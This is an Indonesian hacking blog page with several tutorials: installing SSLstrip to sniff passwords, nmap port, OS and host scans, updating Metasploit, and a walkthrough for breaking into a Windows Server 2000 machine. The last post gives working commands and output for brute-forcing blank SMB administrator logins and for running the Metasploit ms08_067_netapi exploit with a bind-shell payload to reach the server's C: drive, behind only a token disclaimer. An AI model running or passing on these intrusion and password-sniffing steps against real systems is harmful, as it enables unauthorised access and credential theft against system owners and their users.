Install SSLSTRIP Pada Backtrack 5 , Ubuntu, Dan Debian

SSLSTRIP adalah salah satu tools yang terkenal yang berguna untuk sniffing password dari http maupun https. Tools ini lebih sakti dari tools yang sudah banyak orang tau yaitu Cain and abel. Carin and abel yang selama ini kita gunakan hanya bisa sniff password http, kalau https saya belum tau, karena saya belum pernah lihat dan coba.

Berikut ini adalah cara install SSLSTRIP pada LINUX backtrack, Dbuntu, dan Debian.


1. Download file tar.gz dari website resminya
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

2. Ekstak file tar.gz
tar zxvf sslstrip-0.9.tar.gz

3. Masuk ke folder sslstrip
cd sslstrip-0.9

4. Install sslstrip
python setup.py install

Sekian share dari saya mengenai cara install SSLSTRIP, untuk cara sniffing passwordnya tunggu di postingan berikutnya, semoga bermanfaat, GBU...

Continue Reading »

Scanning Port & Deteksi Operating System Komputer Dengan Nmap

Dalam dunia hacking tahap awal yang kita lakukan tentunya melakukan pengecekan terhadap system yang akan kita serang. Kita harus melihat Operating System apa yang dia gunakan, serta port atau servis apa saja yang sedang berjalan.

Pada tutorial sebelumnya saya sudah bahas cara mengetahui komputer yang aktif dalam satu jaringan. Kali ini setelah kita temukan komputer yang sudah aktif, maka kita melakukan scanning port sekaligus deteksi Operating Systemnya.

Saya menggunakan Operating System Backtrack 5 R2, dan tools yang saya gunakan Nmap. Berikut perintah yang saya gunakan pada nmap.



nmap -O 192.168.1.80

Maka hasilnya akan tampak pada gambar dibawah.

Cara lain dari nmap -O 192.168.1.80 adalah

nmap -A -T4 192.168.1.80

Cara ini akan menghasilkan data yang lebih lengkap seperti Workgroup, Computer Name, SMB Security, http-title, http-method, dan traceroute. Seperti gambar dibawah.

Dari hasil diatas, kita sudah dapat melihat servis atau port yang sedang berjalan serta Operating System yang digunakan. Sekian share dari saya semoga bermanfaat, God Bless Us.

Continue Reading »

Update Metasploit Framework Di Backtrack 5

Tools metasploit adalah tools yang sangat terkenal didunia security. Tools ini sangat bagus untuk melakukan penetration testing, baik digunakan oleh black hacker atau white hacker. Tentunya tools metasploit kita harus selalu update supaya module dan exploitnya selalu yang terbaru. Berikut ini cara untuk update metasploit di backtrack.

Pada saat kita sudah masuk ke metasploit, kita tinggal ketikkan : msfupdate
Maka hasilnya akan seperti gambar dibawah.

Gambar 1. Sebelum di update

Gambar 2. Setelah di update

Sekian share dari saya, semoga membantu.

Continue Reading »

Scan IP Address Dengan Menggunakan Backtrack

Scanning IP Addres dalam satu jaringan adalah untuk mengetahui komputer yang sedang aktif atau hidup. Banyak cara yang dapat dilakukan untuk melakukan scanning dalam satu jaringan. Kali ini saya akan membahas bagaimana Scan IP Address dalam satu jaringan. Tool yang saya gunakan adalah Nmap. Nmap adalah salah satu tools Scanning yang paling terkenal dimuka bumi ini. Dan OS yang saya gunakan adalah Linux Backtrack 5.

Perintah yang saya lakukan adalah: nmap -vvvv -O 192.168.1.100-110


Keterangan:
nmap : adalah perintah awal untuk menggunakan tools nmap.
-vvvv : adalah perintah untuk menemukan IP Address yang aktif
-O      : adalah untuk mengetahui Operating System yang digunakan oleh IP tersebut.
192.168.1.100-110 : adalah jarak IP Address yang akan di scan.

Maka tampilannya akan seperti gambar dibawah.

Sebenarnya masih banyak lagi teknik scanning dari nmap, tinggal ketikkan nmap maka akan muncul keterangan yang lebih lengkap mengenai cara penggunaannya. Demikian sharing dari saya mudah mudahan bermanfaat, GBU.

Continue Reading »

Hacking Windows Server 2000

Hallo gan, selamat datang di blog saya. Di posting kali ini saya akan membahas tentang cara masuk ke Server. Saya membahas cara masuk ke server Windows Server 2000.

Oke kita akan masuk pada tahap pertama yaitu tools yang di perlukan.
- Nmap
- Metasploit Framework 3
Boleh menggunakan Backtrack, karena sudah tersedia. Dan saya akan membahasnya dengan menggunakan backtrack. Target kita ada di jaringan lokal 23.


1. Scanning

Kita akan melakukan scanning terlebih dahulu untuk melihat IP yang aktif. Masuk ke backtracknya dan buka shell konsole nya. Lalu ketikkan nmap –v 192.168.7.23-254.

Maka akan muncul hasilnya sperti gambar di bawah beserta dengan port yang terbuka.

Setelah menemukan IP yang aktif, maka kita melakukan scanning satu per satu. Dan saya menemukan 1 IP yang menggunakan Windows server yaitu 192.168.23.150. Caranya dengan mengetikkan perintah di nmap
nmap --script smb-os-discovery.nse -p445 192.168.23.150

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-07-13 08:20 UTC
Nmap scan report for 192.168.23.150
Host is up (0.061s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-os-discovery:
|   OS: Windows 2000 (Windows 2000 LAN Manager)
|   Name: WORKGROUP\ME-CXWBONL2ROOF
|_  System time: 2011-07-13 08:29:31 UTC+7
Nmap done: 1 IP address (1 host up) scanned in 13.32 seconds

Pada hasil scanning diatas terlihat jelas kalau OS yang digunakan Windows Server 2000. Setelah itu lakukan scanning lagi dengan mengetikkan  
nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.23.150 
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-07-13 07:18 UTC
Nmap scan report for 192.168.23.150
Host is up (0.0020s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
137/udp open  netbios-ns

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  me:<blank> => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 54.47 seconds



2. Attack
Setelah kita melakukan scanning diatas, kita sudah cukup medapatkan informasi untuk dapat menembus Server tersebut. Ada 2 cara untuk masuk ke server tersebut, yaitu melalui FTP server dan Tools Metasploit.

A. Dari hasil scanning diatas kita sudah dapat melihat jelas bahwa pada saat scanning pertama kita lihat bahwa port FTP terbuka, dan pada scanning yang ketiga kita memperoleh data Username administrator dan me, dan yang lebih penting lagi bahawa password nya blank dan login berhasil.

administrator:<blank> => Login was successful
|_  me:<blank> => Login was successful

Seperti pada gambar di bawah. Saya mengetikkan IP target di addres \\192.168.23.152 , setelah saya tekan enter maka dia akan meminta username dan password. Tinggal mengetikkan username administrator dan password kosong maka login akan berhasil.

. 

B. Pada langkah yang kedua saya akan menjelaskan cara masuk dengan Metasploit Framework yang tersedia di Backtrack 4 R2 . Pada shell konsole ketikkan

msfconsole

use windows/smb/ms08_067_netapi

set payload windows/shell_bind_tcp
set RHOST 192.168.23.150
exploit

Seperti pada gambar di bawah.

Dan setelah exploit maka kita akan langsung dapat mengakses drive C dari server tersebut.
Ini hanya sekedar sharing ilmu gan, jangan disalah gunain buat hal-hal yang tidak baik, resiko ditanggung sendiri.
Demikian tutorial dari saya, saya harap dapat menambah wawasan teman semua.
Salam...God Bless You.

Continue Reading »